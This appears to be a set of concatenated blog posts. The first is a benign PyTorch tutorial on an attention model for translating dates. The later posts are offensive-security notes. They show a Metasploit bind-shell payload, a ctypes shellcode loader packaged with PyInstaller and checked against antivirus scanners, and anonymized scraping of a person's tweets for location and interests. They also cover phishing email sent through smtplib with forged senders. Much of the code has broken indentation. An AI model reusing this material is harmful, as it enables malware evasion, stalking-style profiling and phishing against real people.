对于每一轮的输出，它的解码RNN的输入由上一轮输出和注意力上下文拼接而成。注意力上下文，就是所有输入的编码RNN的隐变量的一个加权平均数。这里加权平均数的权重就是该输出对每一个输入的注意力。每一个由编码RNN本轮状态和解码RNN上一轮状态决定。这两个输入会被送入一个简单的全连接网络，输出权重（一个实数）。所有输入元素的经过一个softmax输出。

日期翻译任务及其数据集为了简化项目的实现，我们来完成一个简单的日期翻译任务。在这个任务中，输入是各式各样的日期，输出是某一个标准格式的日期。比如：

| input | output | | — | — | | Nov 23, 1999 | 1999-11-23 | | 3 April 2005 | 2005-04-03 | | 14/01/1989 | 1989-01-14 | | Thursday, February 7, 1985 | 1985-02-07 | 我们可以自己动手用Python生成数据集。在生成数据集时，我们要用到随机生成日期的faker库和格式化日期的babel库。

pip install faker babel

运行下面这段代码，我们可以生成不同格式的日期。

import random

from babel.dates import format_date
from faker import Faker

faker = Faker()
format_list = [
    'short', 'medium', 'long', 'full', 'd MMM YYY', 'd MMMM YYY', 'dd/MM/YYY',
    'dd-MM-YYY', 'EE d, MMM YYY', 'EEEE d, MMMM YYY'
]

if __name__ == '__main__':
    for format in format_list:
        date_obj = faker.date_object()
        print(f'{format}:', date_obj,
              format_date(date_obj, format=format, locale='en'))

Possible output:
short: 1986-02-25 2/25/86
medium: 1979-08-05 Aug 5, 1979
long: 1971-12-15 December 15, 1971
full: 2017-02-14 Tuesday, February 14, 2017
d MMM YYY: 1984-02-21 21 Feb 1984
d MMMM YYY: 2011-06-22 22 June 2011
dd/MM/YYY: 1991-08-02 02/08/1991
dd-MM-YYY: 1987-06-12 12-06-1987
EE d, MMM YYY: 1986-11-02 Sun 2, Nov 1986
EEEE d, MMMM YYY: 1996-01-26 Friday 26, January 1996

Faker()是生成随机数据的代理类，用它的date_object()方法可以随机生成一个日期字符串date_obj。这个日期就是我们期望的标准格式。而通过使用format_date函数，我们可以通过改变该函数的format参数来得到格式不一样的日期字符串。各种格式的日期示例可以参考上面的输出。

利用这些工具函数，我们可以编写下面这些生成、读取数据集的函数。

def generate_date():
    format = random.choice(format_list)
    date_obj = faker.date_object()
    formated_date = format_date(date_obj, format=format, locale='en')
    return formated_date, date_obj


def generate_date_data(count, filename):
    with open(filename, 'w') as fp:
        for _ in range(count):
            formated_date, date_obj = generate_date()
            fp.write(f'{formated_date}\t{date_obj}\n')


def load_date_data(filename):
    with open(filename, 'r') as fp:
        lines = fp.readlines()
        return [line.strip('\n').split('\t') for line in lines]


generate_date_data(50000, 'dldemos/attention/train.txt')
generate_date_data(10000, 'dldemos/attention/test.txt')

注意力模型在这个项目中，最难的部分是注意力模型的实现，即如何把上一节那个结构图用PyTorch描述出来。所有模型实现的代码如下：

import torch
import torch.nn as nn
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader, Dataset

from dldemos.attention.dataset import generate_date, load_date_data


EMBEDDING_LENGTH = 128
OUTPUT_LENGTH = 10

class AttentionModel(nn.Module):
    def __init__(self,
                 embeding_dim=32,
                 encoder_dim=32,
                 decoder_dim=32,
                 dropout_rate=0.5):
        super().__init__()
        self.drop = nn.Dropout(dropout_rate)
        self.embedding = nn.Embedding(EMBEDDING_LENGTH, embeding_dim)
        self.attention_linear = nn.Linear(2 * encoder_dim + decoder_dim, 1)
        self.softmax = nn.Softmax(-1)
        self.encoder = nn.LSTM(embeding_dim,
                               encoder_dim,
                               1,
                               batch_first=True,
                               bidirectional=True)
        self.decoder = nn.LSTM(EMBEDDING_LENGTH + 2 * encoder_dim,
                               decoder_dim,
                               1,
                               batch_first=True)
        self.output_linear = nn.Linear(decoder_dim, EMBEDDING_LENGTH)
        self.decoder_dim = decoder_dim

    def forward(self, x: torch.Tensor, n_output: int = OUTPUT_LENGTH):
        # x: [batch, n_sequence, EMBEDDING_LENGTH]
        batch, n_squence = x.shape[0:2]

        # x: [batch, n_sequence, embeding_dim]
        x = self.drop(self.embedding(x))

        # a: [batch, n_sequence, hidden]
        a, _ = self.encoder(x)

        # prev_s: [batch, n_squence=1, hidden]
        # prev_y: [batch, n_squence=1, EMBEDDING_LENGTH]
        # y: [batch, n_output, EMBEDDING_LENGTH]
        prev_s = x.new_zeros(batch, 1, self.decoder_dim)
        prev_y = x.new_zeros(batch, 1, EMBEDDING_LENGTH)
        y = x.new_empty(batch, n_output, EMBEDDING_LENGTH)
        tmp_states = None
        for i_output in range(n_output):
            # repeat_s: [batch, n_squence, hidden]
            repeat_s = prev_s.repeat(1, n_squence, 1)
            # attention_input: [batch * n_sequence, hidden_s + hidden_a]
            attention_input = torch.cat((repeat_s, a),
                                        2).reshape(batch * n_squence, -1)
            alpha = self.softmax(self.attention_linear(attention_input))
            c = torch.sum(a * alpha.reshape(batch, n_squence, 1), 1)
            c = c.unsqueeze(1)
            decoder_input = torch.cat((prev_y, c), 2)

            if tmp_states is None:
                prev_s, tmp_states = self.decoder(decoder_input)
            else:
                prev_s, tmp_states = self.decoder(decoder_input, tmp_states)

            prev_y = self.output_linear(prev_s)
            y[:, i_output] = prev_y.squeeze(1)
        return y

让我们把这份实现一点一点过一遍。

在实现前，我们要准备一些常量。我们首先要决定“词汇表”的大小。在日期翻译任务中，输入和输出应当看成是字符序列。字符最多有128个，因此我们可以令“词汇表”大小为128。

EMBEDDING_LENGTH = 128

在我们这个任务中，输出序列的长度是固定的。对于yyyy-mm-dd这个日期字符串，其长度为10。我们要把这个常量也准备好。

OUTPUT_LENGTH = 10

接下来是模型的实现。先看__init__里的结构定义。一开始，按照RNN模型的惯例，我们要让输入过Dropout和嵌入层。对于单词序列，使用预训练的单词嵌入会好一点。然而，我们这个项目用的是字符序列，直接定义一个可学习的嵌入层即可。

self.drop = nn.Dropout(dropout_rate)
self.embedding = nn.Embedding(EMBEDDING_LENGTH, embeding_dim)

接下来是编码器和解码器。在注意力模型中，编码器和解码器是两个不同的RNN。为了充分利用输入信息，可以把双向RNN当作编码器。而由于机器翻译是一个生成答案的任务，每轮生成元素时需要用到上一轮生成出来的元素，解码器必须是一个单向RNN。在本项目中，我使用的RNN是LSTM。模块定义代码如下：

self.encoder = nn.LSTM(embeding_dim,
                        encoder_dim,
                        1,
                        batch_first=True,
                        bidirectional=True)
self.decoder = nn.LSTM(EMBEDDING_LENGTH + 2 * encoder_dim,
                        decoder_dim,
                        1,
                        batch_first=True)     

这里要注意一下这两个模块的输入通道数。encoder的输入来自嵌入层，因此是embeding_dim，这个很好理解。decoder的输入通道则需要计算一番了。decoder的输入由模型上一轮的输出和注意力输出拼接而成。模型每轮会输出一个字符，字符的通道数是“词汇表”大小，即EMBEDDING_LENGTH。注意力的输出是encoder的隐变量的加权和，因此其通道数和encoder的隐变量一致。encoder是双向RNN，其隐变量的通道数是2 * encoder_dim。最终，decoder的输入通道数应是EMBEDDING_LENGTH + 2 * encoder_dim。

在注意力模块中，解码RNN对各编码RNN的注意力由一个线性层计算而得。该线性层的输入由解码RNN和编码RNN的隐变量拼接而成，因此其通道数为2 * encoder_dim + decoder_dim；该线性层的输出是注意力权重——一个实数。

self.attention_linear = nn.Linear(2 * encoder_dim + decoder_dim, 1)

解码结束后，还需要经过一个线性层才能输出结果。

self.output_linear = nn.Linear(decoder_dim, EMBEDDING_LENGTH)

看完了__init__，来看看forward里各模块是怎么连接起来的。

机器翻译其实是一个生成序列的任务。一般情况下，生成序列的长度是不确定的，需要用一些额外的技巧来选择最佳的输出序列。为了简化实现，在这个项目中，我们生成一个固定长度的输出序列。该长度应该在forward的参数里指定。因此，forward的参数如下：

def forward(self, x: torch.Tensor, n_output: int = OUTPUT_LENGTH):

一开始，先获取一些形状信息。

# x: [batch, n_sequence, EMBEDDING_LENGTH]
batch, n_squence = x.shape[0:2]

输入通过嵌入层和dropout层。

# x: [batch, n_sequence, embeding_dim]
x = self.drop(self.embedding(x))

再通过编码器，得到编码隐状态a。

# a: [batch, n_sequence, hidden]
a, _ = self.encoder(x)

接下来，要用for循环输出每一轮的结果了。在此之前，我们要准备一些中间变量：用于计算注意力的解码器上一轮状态prev_s，用于解码器输入的上一轮输出prev_y，输出张量y。另外，由于我们要在循环中手动调用decoder完成每一轮的计算，还需要保存decoder的所有中间变量tmp_states。

# prev_s: [batch, n_squence=1, hidden]
# prev_y: [batch, n_squence=1, EMBEDDING_LENGTH]
# y: [batch, n_output, EMBEDDING_LENGTH]
prev_s = x.new_zeros(batch, 1, self.decoder_dim)
prev_y = x.new_zeros(batch, 1, EMBEDDING_LENGTH)
y = x.new_empty(batch, n_output, EMBEDDING_LENGTH)
tmp_states = None

在每一轮输出中，我们首先要获得当前的解码器对于每一个输入的注意力alpha。每一个alpha由解码器上一轮状态prev_s和编码器本轮状态决定（一个全连接层+softmax）。为了充分利用并行计算，我们可以把所有alpha的计算打包成batch，一步做完。

注意，这里的全连接层+softmax和普通的全连接网络不太一样。这里全连接层的输出通道数是1，会对n组输入做n次计算，得到n个结果，再对n个结果做softmax。我们之所以能一次得到n个结果，是巧妙地把n放到了batch那一维。

for i_output in range(n_output):
    # repeat_s: [batch, n_squence, hidden]
    repeat_s = prev_s.repeat(1, n_squence, 1)
    # attention_input: [batch * n_sequence, hidden_s + hidden_a]
    attention_input = torch.cat((repeat_s, a),
                                2).reshape(batch * n_squence, -1)
    # x: [batch * n_sequence, 1]
    x = self.attention_linear(attention_input)
    # x: [batch, n_sequence]
    x = x.reshape(batch, n_squence)
    alpha = self.softmax(x)

求出了注意力alpha后，就可以用它来算出注意力上下文c了。

c = torch.sum(a * alpha.reshape(batch, n_squence, 1), 1)

之后，我们把c和上一轮输出prev_y拼一下，作为解码器的输出。

c = c.unsqueeze(1)
decoder_input = torch.cat((prev_y, c), 2)

再调用解码器即可。这里我利用PyTorch的机制偷了个懒。理论上解码器第一轮的状态应该是全零张量，我们应该初始化两个全零张量作为LSTM的初始状态。但是，在PyTorch里，如果调用RNN时不传入状态，就默认会使用全零状态。因此，在第一轮调用时，我们可以不去传状态参数。

if tmp_states is None:
    prev_s, tmp_states = self.decoder(decoder_input)
else:
    prev_s, tmp_states = self.decoder(decoder_input, tmp_states)

最后，用线性层算出这轮的输出，维护输出变量y。循环结束后，返回y。

    prev_y = self.output_linear(prev_s)
    y[:, i_output] = prev_y.squeeze(1)

return y

训练、测试、推理写完了最核心的注意力模型，剩下的代码就比较简单了。

首先，我们要准备一个Dataset类。这个类可以读取输入、输出字符串，并把它们转换成整形数组。字符和整形数字间的映射非常暴力，一个字符的序号就是该字符的ASCII码。这样写比较简洁，但由于很多字符是用不到的，会浪费一些计算性能。

def stoi(str):
    return torch.LongTensor([ord(char) for char in str])


def itos(arr):
    return ''.join([chr(x) for x in arr])


class DateDataset(Dataset):
    def __init__(self, lines):
        self.lines = lines

    def __len__(self):
        return len(self.lines)

    def __getitem__(self, index):
        line = self.lines[index]

        return stoi(line[0]), stoi(line[1])

准备好DataSet后，就可以生成DataLoader了。在序列任务中，各个样本的序列长度可能是不一致的。我们可以用PyTorch的pad_sequence对长度不足的样本进行0填充，使得一个batch里的所有样本都有着同样的序列长度。

def get_dataloader(filename):

    def collate_fn(batch):
        x, y = zip(*batch)
        x_pad = pad_sequence(x, batch_first=True)
        y_pad = pad_sequence(y, batch_first=True)
        return x_pad, y_pad

    lines = load_date_data(filename)
    dataset = DateDataset(lines)
    return DataLoader(dataset, 32, collate_fn=collate_fn)

这里要稍微注意一下，pad_sequence默认会做0填充，0填充在我们的项目里是合理的。在我们定义的“词汇表”里，0对应的是ASCII里的0号字符，这个字符不会和其他字符起冲突。

做好一切准备工作后，可以开始训练模型了。训练模型的代码非常常规，定义好Adam优化器、交叉熵误差，跑完模型后reshape一下算出loss再反向传播即可。

def main():
    device = 'cuda:0'
    train_dataloader = get_dataloader('dldemos/attention/train.txt')
    test_dataloader = get_dataloader('dldemos/attention/test.txt')

    model = AttentionModel().to(device)

    # train

    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
    citerion = torch.nn.CrossEntropyLoss()
    for epoch in range(20):

        loss_sum = 0
        dataset_len = len(train_dataloader.dataset)

        for x, y in train_dataloader:
            x = x.to(device)
            y = y.to(device)
            hat_y = model(x)
            n, Tx, _ = hat_y.shape
            hat_y = torch.reshape(hat_y, (n * Tx, -1))
            label_y = torch.reshape(y, (n * Tx, ))
            loss = citerion(hat_y, label_y)

            optimizer.zero_grad()
            loss.backward()
            torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)
            optimizer.step()

            loss_sum += loss * n

        print(f'Epoch {epoch}. loss: {loss_sum / dataset_len}')

    torch.save(model.state_dict(), 'dldemos/attention/model.pth')

训练完模型后，我们可以测试一下模型在测试集上的正确率。在日期翻译任务中，我们可以把“正确”定义为输出和真值一模一样。比如一条日期的真值是”2000-01-01”，模型的输出必须也是”2000-01-01”才能说这个输出是正确的。编写并行化计算正确率的代码稍有难度。

模型的输出hat_y表示各个字符的出现概率。我们先用prediction = torch.argmax(hat_y, 2)把序列里每个概率最大的字符作为模型预测的字符。现在，我们要用并行化编程判断每对序列（整形标签数组）predition[i]和y[i]是否相等（注意，predition和y是带了batch那个维度的）。这里，我们可以让predition[i]和y[i]做减法再求和。仅当这个和为0时，我们才能说predition[i]和y[i]完全相等。通过这样一种曲折的实现方法，我们可以并行地算出正确率。

也许有更方便的API可以完成这个逻辑判断，但去网上搜索这么复杂的一个需求太麻烦了，我偷了个懒。

# test
model.load_state_dict(torch.load('dldemos/attention/model.pth'))

accuracy = 0
dataset_len = len(test_dataloader.dataset)

for x, y in test_dataloader:
    x = x.to(device)
    y = y.to(device)
    hat_y = model(x)
    prediction = torch.argmax(hat_y, 2)
    score = torch.where(torch.sum(prediction - y, -1) == 0, 1, 0)
    accuracy += torch.sum(score)

print(f'Accuracy: {accuracy / dataset_len}')

最后，我们也可以临时生成几个测试用例，输出模型的预测结果。

# inference
for _ in range(5):
    x, y = generate_date()
    origin_x = x
    x = stoi(x).unsqueeze(0).to(device)
    hat_y = model(x)
    hat_y = hat_y.squeeze(0).argmax(1)
    hat_y = itos(hat_y)
    print(f'input: {origin_x}, prediction: {hat_y}, gt: {y}')

训练20-30个epoch后，模型差不多就收敛了。我训练的模型在测试集上的正确率约有98%。下面是随机测试用例的推理结果，可以看出模型的判断确实很准确。

input: 4 November 1988, prediction: 1988-11-04, gt: 1988-11-04
input: Friday 26, March 2021, prediction: 2021-03-26, gt: 2021-03-26
input: Saturday 2, December 1989, prediction: 1989-12-02, gt: 1989-12-02
input: 15/10/1971, prediction: 1971-10-15, gt: 1971-10-15
input: Mon 9, Oct 1989, prediction: 1989-10-09, gt: 1989-10-09

总结

在这篇文章中，我展示了一个用PyTorch编写的注意力模型，它用于完成日期翻译任务。在这个项目中，最重要的是注意力模型的编写。如今，注意力模型已经不是功能最强大的模型架构了。不过，通过动手实现这个模型，我们可以对注意力机制有着更深刻的认识，有助于理解那些更先进的模型。

Using Python to implement anti-killing

2024-12-23T00:00:00+00:00

用 Python 实现免杀

被命名为“火焰”（Flame）的恶意软件，在用被称为 Beetlejuice、Microbe、Frog、Snack 和 Gator 的 Lua 脚本编译后，该恶意软件可以通过蓝牙标识出被其侵入的计算机、秘密录音，入侵附近的计算机并往远程命令和控制服务器上传屏幕截图和数据。大多数杀毒引擎仍在使用基于特征码的检测作为主要的检测手段。

免杀的过程

在 Metasploit 框架中包含有一个恶意代码库。使用 Metasploit 生成 C 语言风格的一些 shellcode 作为恶意载荷。

# msfpayload windows/shell_bind_tcp LPORT=1337 C

要写一段用来执行这段 C 语言风格的 shellcode 脚本。Python 支持导入其他语言的函数库，导入 ctypes 库——这个库使我们能用 C 语言中的数据类型。

from ctypes import *
shellcode = ("...")
memory_with_shell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memory_with_shell, CFUNCTYPE(c_void_p))
shell()

下一步，使用 Pyinstaller 生成 Windows PE（portable executable）格式的可执行文件。

免杀验证

使用 vscan.novirusthanks.org 的服务来扫描可执行文件。NoVirusThanks 提供了一个 Web 网页界面，可以上传可疑文件，然后用多种不同的杀毒引擎扫描它。可以编写一个小巧的 Python 脚本自动完成这一步骤。在通过 Web 网页界面交互时，抓取一个 tcpdump 抓包文件，利用 httplib 库进行编写。

注意 boundary 字段，是用来分隔文件内容和数据包中其他内容的

def upload_file(file_name):
    print("[+] Uploading file to NoVirusThanks...")
    file_contents = open(file_name, "rb").read()
    header = {
      "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryF17rwCZdGuPNPT9U"
    }
    params = "----WebKitFormBoundaryF17rwCZdGuPNPT9U"
    params += '\r\nContent-Disposition: form-data; name="upfile"; filename="{}"'.format(file_name)
    params += '\r\nContent-Type: application/octet stream\r\n\r\n'
    params += file_contents
    params += '\r\n------WebKitFormBoundaryF17rwCZdGuPNPT9U'
    params += '\r\nContent-Disposition: form-data; name="submitfile"\r\n'
    params += "------WebKitFormBoundaryF17rwCZdGuPNPT9U--\r\n"
    conn = httplib.HTTPConnection("vscan.novirusthanks.org")
    conn.request("POST", "/", params, header)
    response = conn.getresponse()
    location = response.getheader("location")
    conn.close()
    return location

接下来写一个把我们上传的可疑文件的扫描结果打印出来的 Python 脚本。首先，脚本要连接到 “file” 页面，它会返回一个 “正在进行扫描” 的消息。一旦这个页面返回一个 HTTP 302，就重定向到分析结果页面，可以使用一个正则表达式读取发现率，并把 CSS 代码用空白字符串替换掉。

def print_results(url):
    status = 200
    host = url_parse(url)[1]
    path = url_parse(url)[2]
    if "analysis" not in path:
        while status != 302:
            conn = httplib.HTTPConnection(host)
            conn.request("GET", path)
            resp = conn.getresponse()
            status = resp.status
            print("[+] Scanning file...")
            conn.close()
            time.sleep(15)
	print("[+] Scan Complete.")
    path = path.replace("file", "analysis")
    conn = httplib.HTTPConnection(host)
    conn.request("GET", path)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    re_results = re.findall(r"Detection rate:.*\) ", data)
    html_strip_res = re_results[1].replace("<font color='red'>", '').replace("</font>", "")
    print("[+] {}".format(html_strip_res))

使用默认的 Metasploit 编码器把它编码到一个标准的 Windows 可执行文件中。这个文件显然无法逃过正常的杀毒软件的查杀

$ msfpayload windows/shell_bind_tcp LPORT=1337 X > bindshell.exe

Probing the Network with Python

2024-11-17T00:00:00+00:00

用 Python 刺探网络

使用 Mechanize 库上网

Mechanize 中的主要类（Browser）允许我们对浏览器中的任何内容进行操作。

import mechanize
def view_page(url):
    browser = mechanize.Browser()
    page = browser.open(url)
    source_code = page.read()
    print(source_code)
view_page("http://www.syngress.com/")

Mechanize 提供了状态化编程（stateful programming）和方便的 HTML 表单填写，便于解析和处理诸如 “HTTP-Equiv” 和刷新之类的命令。此外，它还自带了不少能让你保持匿名状态的函数。

网站有多种方法能够唯一标识网页的访问者。Web 服务器记录发起网页请求的 IP 是标识用户的第一种方式。Python 也可以连接代理服务器，这能给程序增加匿名性。Mechanize 的 Browser 类中有一个属性，即程序能用它指定一个代理服务器。MyCurdy 在 http://rmccurdy.com/scripts/proxy/good.txt 中维护着一个可用代理的列表。

import mechanize
def test_proxy(url, proxy):
    browser = mechanize.Browser()
    browser.set_proxies(proxy)
    page = browser.open(url)
    source_code = page.read()
    print(source_code)
url = "http://ip.nefsc.noaa.gov/"
hide_me_proxy = {"http": "216.155.139.115:3128"}
test_proxy(url, hide_me_proxy)

浏览器现在有一层匿名性了，但网站还会使用浏览器提供的 user-agent 字符串作为唯一标识用户的另一种方法。在正常情况下，user-agent 字符串可以让网站获知用户使用的是哪种浏览器这一重要信息，同时这个字段还记录了内核版本、浏览器版本，以及其他一些关于用户的详细信息。恶意网站利用这些信息根据不同的浏览器版本发送不同的漏洞利用代码，而其他一些网站则利用这些信息区分那些躲在 NAT 后面的局域网里的永不。

Mechanize 能像添加代理那样，轻松修改 user-agent，网站提供了大量有效的 user-agent 字符串。

import mechanize
def test_user_agent(url, user_agent):
    browser = mechanize.Browser()
    browser.addheaders = user_agent
    page = browser.open(url)
    source_code = page.read()
    print(source_code)
url = "http://whatismyuseragent.dotdoh.com/"
user_agent = [("User-agent", "Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) ...")]
test_user_agent(url,user_agnet)

网站还会给 Web 浏览器发送 cookie，cookie 中记录了一些能唯一标识用户的信息，网站用它来验证用户之前是否访问/登录过该网站。为了防止这种情况发生，在执行匿名操作之前一定要清除浏览器中的 cookie。有一个库名为 cookielib，其中含有几个不同的能用来处理 cookie 的容器。这里使用的是一个能把各个不同的 cookie 保存到磁盘中的容器。该功能允许用户在收到 cookie 之后，不必把它返回给网站，并能查看其中的内容

import mechanize
import cookielib
def print_cookies(url):
    browser = mechanize.Browser()
    cookie_jar = cookielib.LWPCookieJar()
    browser.set_cookiejar(cookie_jar)
    page = browser.open(url)
    for cookie in cookie_jar:
        print(cookie)
url = "http://www.syngress.com/"
print_cookies(url)

把代码集成在 Python 类的 AnonBrowser 中

import mechanize, cookielib, random
class AnonBrowser(mechanize.Browser):
    def __init__(self, proxies=[], user_agents=[]):
        mechanize.Browser.__init__(self)
        self.set_handle_robots(False)
        self.proxies = proxies
        self.user_agents = user_agents + ["Mozilla/4.0 FireFox/6.01", "ExactSearch", ...]
        self.cookie_jar = cookielib.LWPCookieJar()
        self.set_cookiejar(self.cookie_jar)
        self.anonymize()
        
   	def clear_cookies(self):
		self.cookie_jar = cookielib.LWPCookieJar()
        self.set_cookiejar(self.cookie_jar)
        
	def change_user_agent(self):
        index = random.randrange(0, len(self.user_agents))
        self.addheaders = [("User-agent", (self.user_agents[index]))]
        
	def change_proxy(self):
        if self.proxies:
            index = random.randrange(0, len(self.proxies))
            self.set_proxies({"http": self.proxies[index]})
            
	def anonymize(self, sleep=False):
        self.clear_cookies()
        self.change_user_agent()
        self.change_proxy()
        if sleep:
            time.sleep(60)

anoymize 函数还有一个能让进程休眠 60s 的参数，这会增加使用了匿名化方法前后两次请求在服务器日志中出现的时间间隔

用 AnonBrowser 抓取更多的 Web 页面

用 Beautiful Soup 解析 href 链接

若要把目标网页上的链接全都分析出来，有两种选择：一种是使用正则表达式对 HTML 代码做搜索和替换操作，另一种是使用一款名为 BeautifulSoup 的强大的第三方库。

from AnonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparser
import re
def print_links(url):
    ab = AnonBrowser()
    ab.anonymize()
    page = ab.open(url)
    html = page.read()
    try:
        print("[+] Printing Links From Regex.")
        link_finder = re.compile('href="(.*?)"')
        links = link_finder.findall(html)
        for link in links:
            print(link)
    except:
        pass
   	try:
        print("[+] Printing Links From BeautifulSoup.")
        soup = BeautifulSoup(html)
        links = soup.findAll(name='a')
        for link in links:
            if link.has_key('href'):
                print(link["href"])
    except:
        pass        

用 BeautifulSoup 映射图像

BeautifulSoup 允许我们能在任何 HTML 对象中找出所有的 “IMG” 标签，然后 browser 对象就能下载图片，并将其以二进制文件的形式保存到本地硬盘中。

研究、调查、发现

用 Python 与谷歌 API 交互

谷歌提供了一个应用程序编程接口（API），它让程序员能执行查询操作，获取结果，而不必使用和精通“正常”的谷歌页面。目前谷歌有两个 API，一个简化版的和一个完整版的，使用完整版的 API 需要拥有开发者密钥。简化版的 API 每天仍能进行相当数量的查询，每次搜索能得到约 30 个结果。

import urllib
from AnonBrowser import *
def google(search_term):
    ab = AnonBrowser()
    search_term = urllib.quote_plus(search_term)
    response = ab.open("http://ajax.googleapis.com/ajax/services/searchweb?v=1.0&q={}".format(search_term))
    print(response.read())
google("Boondock Saint")

响应的数据是 JSON 格式的

import json
json.load(response)

来编写一个不带任何额外方法的类保存数据，这将使访问各个字段变得更加容易，而不必专门为获取信息而特意去临时解析三层词典。

import json
import urllib
import optparse
from AnonBrowser import *
class GoogleResult:
    def __init__(self, title, text, url):
        self.title = title
        self.text = text
        self.url = url
   	def __repr__(self):
		return self.title
    
def google(search_term):
    ab = AnonBrowser()
    search_term = urllib.quote_plus(search_term)
    response = ab.open("...")
    objects = json.load(response)
    results = list()
    for result in objects["responseData"]["results"]:
        url = result["url"]
        title = result["titleNoFormatting"]
        text = result["content"]
        new_gr = GoogleResult(title, text, url)
        results.append(new_gr)
   	return results

用 Python 解析 Tweets 个人主页

和谷歌一样，Twitter 也给开发者提供了 API。相关文档位于网址

import json, urllib
from AnonBrowser import *
class ReconPerson:
    def __init__(self, first_name, last_name, job='', social_media={}):
        self.first_name = first_name
        self.last_name = last_name
        self.job = job
        self.social_media = social_media
        
	def __repr__(self):
        return "{} {} has job {}".format(self.first_name, self.last_name, self.job)
    
    def get_social(self, media_name):
        if self.social_media.has_key(media_name):
            return self.social_media[media_name]
        return None
    
	def query_twitter(self, query):
        query = urllib.quote_plus(query)
        results = list()
        browser = AnonBrowser()
        response = browser.open("http://search.twitter.com/search.json?q={}".format(query))
        json_objects = json.load(response)
        for result in json_objects["results"]:
            new_result = dict()
            new_result["name"] = result["name"]
            new_result["geo"] = result["geo"]
            new_result["tweet"] = result["text"]
            results.append(new_result)
        return results
ap = ReconPerson("Boondock", "Saint")
print(ap.query_twitter("from:username since:2010-01-01 include:retweets"))

从推文中提取地理位置信息

许多 Twitter 用户遵循一个公式来撰写他们的推文与世界分享。通常情况下，这个公式为：【该推文是直接推给哪些推特用户的】+【推文的正文，其中常会含有简短的 URL】+【hash 标签】。使用恶意的分割法时，这个公式应该写成：【关注该用户的人，他们信任来自该用户的通信的概率会比较大】+【这个人感兴趣的链接或主题，他可能会对该话题中的其他内容感兴趣】+【这个人可能想要进一步了解的大致方向或主题】。

import json
import urllib
import optparse
from AnonBrowser import *
def get_tweets(handle):
    query = urllib.quote_plus("from:{} since:2009-01-01 include:retweets".format(handle))
    tweets = list()
    browser = AnonBrowser()
    browser.anonymize()
    response = browser.open("http://search.twitter.com/search.json?q={}".format(query))
    json_objects = json.load(response)
    for result in json_objects["results"]:
        new_result = {}
        new_result["from_user"] = result["from_user_name"]
        new_result["geo"] = result["geo"]
        new_result["tweet"] = result["text"]
        tweets.append(new_result)
	return tweets

def load_cities(city_file):
    cities = list()
    for line in open(city_file).readlines():
        city = line.split("\r\n").lower()
        cities.append(city)
   	return cities

def twitter_locate(tweets, cities):
    locations = list()
    loc_cnt = 0
    city_cnt = 0
    tweets_text = str()
    for tweet in tweets:
        if tweet["geo"] != None:
            locations.append(tweet["geo"])
            loc_cnt += 1
            tweets_text += tweet["tweet"].lower()
	for city in cities:
        if city in tweets_text:
            locations.append(city)
            city_cnt += 1
	print("[+] Found {} locations via Twitter API and {} locations from text search.".format(loc_cnt, city_cnt))

用正则表达式解析 Twitter 用户的兴趣爱好

def find_interests(tweets):
    interests = dict()
    interests["links"] = list()
    interests["users"] = list()
    interests["hashtags"] = list()
    for tweet in tweets:
        text = tweet["tweet"]
        links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)
        for link in links:
            if link[0]:
                link = link[0]
           	elif link[1]:
                link = link[1]
			else:
                continue
            try:
                response = urllib2.urlopen(link)
                full_link = response.url
                interests["links"].append(full_link)
            except:
                pass
       	interests["users"] += re.compile("(@\w+)").findall(text)
    	interests["hashtags"] += re.compile("(#\w+)").findall(text)
	interests["users"].sort()
    interests["hashtags"].sort()
    interests["links"].sort()
    return interests

由于推文的字数限制，大多数 URL 会使用各个服务商提供的短网址。这些链接里没什么信息量，因为他们可以指向任何地址。为了把短网址转成正常的 URL，可以用 urllib2 打开它们，在脚本打开页面后，urllib 可以获取到完整的 URL

def find_interests(self):
    interests = dict()
    interests["links"] = list()
    interests["users"] = list()
    interests["hashtags"] = list()
    for tweet in self.tweets:
        text = tweet["tweet"]
        links = re.compile("(http.*?)\Z|(http.*?) ").findall(text)
        for link in links:
            if link[0]:
                link = link[0]
            elif link[1]:
                link = link[1]
			else:
                continue
        try:
            response = urllib2.urlopen(link)
            full_link = response.url
			interests["links"].append(full_link)
		except:
            pass
        interests["users"] += re.compile("(@\w+)").findall(text)
        interests["hashtags"] += re.compile("(#\w+)").findall(text)
        interests["users"].sort()
        interests["hashtags"].sort()
        interests["links"].sort()
   	return interests

匿名电子邮件

相对于获取一个永久性电子邮箱，使用一次性电子邮箱也是另一个很好的选项。Ten Minute Mail 提供的就是这样一种一次性电子邮箱。攻击者可以使用这种很难被追踪的电子邮件账户去创建社交网站账号。

批量社工

使用 smtplib 给目标对象发邮件

正常发送邮件的过程包括打开邮件客户端，单击相应的选项，然后单击新建，最后单击发送。在电脑屏幕后，邮件客户端程序会连接到服务器，有时还需要登录，并提交详细的信息——发件人、收件人和其他必要的数据。

import smtplib
from email.mime.text import MIMEText
def send_mail(user, pwd, to, subject, text):
    msg = MIMEText(text)
    msg["From"] = user
    msg["To"] = to
    msg["Subject"] = subject
    try:
        smtp_server = smptlib.SMTP("smtp.gmail.com", 587)
        print("[+] Connecting To Mail Server.")
        smtp_server.ehlo()
        print("[+] Starting Encrypted Session.")
        smtp_server.starttls()
        smtp_server.ehlo()
        print("[+] Logging Into Mail Server.")
        smtp_server.login(user, pwd)
        print("[+] Seding Mail.")
        smtp_server.sendmail(user, to, msg.as_string())
        smtp_server.close()
        print("[+] Mail Sent Successfully.")
 	except:
        print("[-] Seding Mail Failed.")
        
user = "username"
pwd = "password"
send_mail(user, pwd, "target@target.target", "Re: Important", "Test Message")

不过许多电子邮件服务器是不允许转发邮件的，所以只能将邮件传递到指定的地址。本地电子邮件服务器可以被设为允许转发邮件，或允许转发来自网上的邮件，这是它会把来自任意地址的电子邮件转发的任意地址中——即使邮件地址的格式都不对也没关系。伪造发信地址是关键，使用邮件客户端脚本，再加上一个允许转发邮件的服务器。

用 smtplib 进行网络钓鱼

为了降低被识破的概率，只生成一段非常简单的含有恶意代码的文本，把它作为邮件的正文。程序会根据它所拥有的数据，随机生成文本。具体步骤是：选择一个虚拟的发信人电子邮箱地址，指定一个主题，生成正文文本，然后发送电子邮件。

